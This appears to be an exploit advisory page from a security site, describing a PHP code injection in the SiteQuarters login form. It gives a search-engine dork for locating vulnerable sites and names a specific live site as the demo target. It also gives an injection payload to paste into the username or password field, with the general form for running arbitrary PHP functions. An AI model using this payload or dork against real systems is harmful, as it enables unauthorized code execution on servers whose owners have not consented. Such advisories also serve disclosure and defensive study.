SiteQuarters PHP Code Injection

2018.08.22
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

---------------------------------------------------------------- * Exploit Title: SiteQuarters PHP Code Injection ---------------------------------------------------------------- * Exploit Author: General Ghasemi * Telegram @GeneralGhasemi * Tested on: Windows 10 * tiredandalone855@gmail.com ---------------------------------------------------------------- * search google Dork : "Powered by SiteQuarters" In The Post Method Of Login Page We can Run Any Php Code Like This ${@functionname()} Example: Go to Demo Site: http://www.sjbmanagementinc.com/login.php And Copy & Paste This Code in username or password field : ${@print(GeneralGhasemi)} And Submit Login Form ! You See Page Print My Name! * Demo: PHP Code Injection http://www.sjbmanagementinc.com/login.php ----------------------------------------------------------------


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top